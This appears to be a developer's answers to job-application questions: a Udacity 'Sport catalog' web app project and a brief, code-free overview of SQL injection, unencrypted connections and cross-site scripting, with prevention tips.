“Clean Code” . It’s very good book to help programmer to write efficient and high-quality code.
Tell me about a web application you have built. Why did you choose to build it? What did you learn? What challenges did you face and how did you overcome them?
I have build a web application called ‘Sport catalog’. The application can help people to store their sports equipment information in different sport category. It was a required project for completing my Full Stack Web Developer nanodegree in Udacity online school. I have learned how to build a well-rounded web application from scratch and also learned how to deploy the app into a Linux server with its configuration. I have faced some challenges when I was developing the app such as unknown bugs and deployment issues. But I overcame it by patience and research. I have also learned the importance of documentation in development, because that will help you in a long term.
List 2-3 attacks that web applications are vulnerable to. How do these attacks work? How can we prevent those attacks?
There are so many types of user input injection vulnerabilities, such SQL injection or XML injection. For example, an SQL injection could replace or concatenate a existing query to bypass the existing query's logic in order to access or destroy the data. The way to prevent this type attacks to do input validation and sanitization. It can be served by some vetted libraries such as bleach.
This kind of vulnerability can allow attacks to capture or bypass authentication methods used to protect against unauthorized access to your application. For example, unencrypted connections between client and server communication. This kind of security hole can lead all the information to attackers and give them chance to interpret the date in their own term. The solution for the type of security hole is to use secure connections such as https to encrypt your request to the server.
This kind of security hole is to let attackers insert javascript into the page from a trusted site. By doing so, they can alter the client script to help them access users' credential in order to do some evil actions with that. For example, the attackers could use a social link to invoke the function by leading users to invoke a click event. The result for the action is to install virus software into victims' operating system.
If you were to start your full-stack developer position today, what would be your goals a year from now?
Learning something new everyday, share my experience to the community and have fun hacking.